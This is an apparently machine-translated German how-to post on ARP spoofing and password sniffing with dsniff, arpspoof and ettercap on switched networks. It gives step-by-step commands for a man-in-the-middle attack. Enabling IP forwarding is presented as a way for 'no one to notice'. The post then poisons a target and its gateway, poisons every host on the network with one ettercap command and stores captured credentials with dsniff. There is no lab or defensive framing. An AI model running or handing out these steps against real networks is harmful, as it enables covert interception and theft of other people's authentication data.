Dsniff ist eine der umfassendsten und leistungsstärksten frei verfügbaren Packet-Sniffing-Tool-Suiten zum Erfassen und Verarbeiten von Authentifizierungsinformationen. Seine Funktionalität und zahlreiche Dienstprogramme haben es zu einem gängigen Werkzeug gemacht, das von Angreifern verwendet wird, um Passwörter und Authentifizierungsinformationen aus Netzwerken auszuspähen.
Ein Netzwerk-Switch leitet Pakete nicht auf die gleiche Weise an alle im Netzwerk weiter wie ein Netzwerk-Hub, sodass eine Person im Netzwerk theoretisch nicht den Datenverkehr einer anderen Person einsehen kann. Es gibt jedoch Möglichkeiten, dieses Problem zu lösen, nämlich durch Arp-Spoofing.
Dsniff
Dieser Beitrag wird nur diskutieren, wie es gemacht wird, ohne die Theorie hinter dem Prozess zu diskutieren. Um zu beginnen, müssen Sie das erforderliche Programm installieren, in diesem Fall das dsniff-Paket, das das benötigte arpspoof-Programm enthält. In Ubuntu oder jeder anderen Debian-basierten Distribution kann es mit dem folgenden apt-get-Befehl installiert werden:
Installieren (Ubuntu)
$ sudo apt-get install dsniff
IP-Weiterleitung aktivieren
Um sicherzustellen, dass der Datenverkehr an das tatsächliche Ziel weitergeleitet wird, wenn er unseren Computer erreicht, muss der folgende Befehl ausgeführt werden;
$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
Dadurch wird sichergestellt, dass die Verbindung des Zielcomputers nicht getrennt wird und niemand merkt, was wir tun.
ARP-Spoofing ausführen
Der folgende Befehl sagt dem Gateway „Ich bin 192.168.0.100“, und der nächste Befehl sagt 192.168.0.100 „Ich bin das Gateway“
$ sudo arpspoof 192.168.0.100 -t 192.168.0.1 $ sudo arpspoof 192.168.0.1 -t 192.168.0.100
Damit wird der gesamte Datenverkehr, der von der Maschine zum Gateway und umgekehrt gehen soll, zuerst durch unsere Maschine geleitet und erst dann an das eigentliche Ziel weitergeleitet. Damit können wir jedes Paketanalyse-Tool wie tcpdump oder Wireshark ausführen.
Etterkappe
Es gibt jedoch Programme, die den gesamten Vorgang vereinfachen. Eines der beliebtesten Programme dafür ist ettercap. Ettercap kann neben vielen anderen Funktionen auch Arp-Spoofing durchführen. In Ubuntu heißt das Paket ettercap-gtk;
Installieren (Ubuntu)
$ sudo apt-get install ettercap-gtk
ARP-Spoofing (GUI) ausführen
Wenn Sie das Programm mit dem Schalter -G ausführen, wird es in GTK und nicht in ncurses ausgeführt.
$ sudo ettercap -G
Wählen Sie im Menü Folgendes aus:
Sniff -> Unfied sniffing
Wählen Sie an der Eingabeaufforderung die zu verwendende Netzwerkschnittstelle aus. Normalerweise wäre es eth0
Network Interface: eth0
Wählen Sie erneut im Menü Folgendes aus, um alle Hosts im Netzwerk zur Liste hinzuzufügen
Hosts -> Scan for hosts
Und das Folgende wird das Arp-Spoofing für alle im Netzwerk durchführen
Mitm -> Arp poisoning -> Ok Start -> Start sniffing
ARP-Spoofing ausführen (Befehl)
Der folgende Befehl macht dasselbe wie das obige Beispiel in einem einzigen Befehl;
$ sudo ettercap -q -T -M arp // //
dsniff-Befehlsbeispiele
1. So überwachen Sie das Netzwerk auf unsichere Protokolle:
# dsniff -m [-i interface] [-s snap-length] [filter-expression]
2. So speichern Sie Ergebnisse in einer Datenbank, anstatt sie auszudrucken:
# dsniff -w gotcha.db [other options...]
3. So lesen und drucken Sie die Ergebnisse aus der Datenbank:
# dsniff -r gotcha.db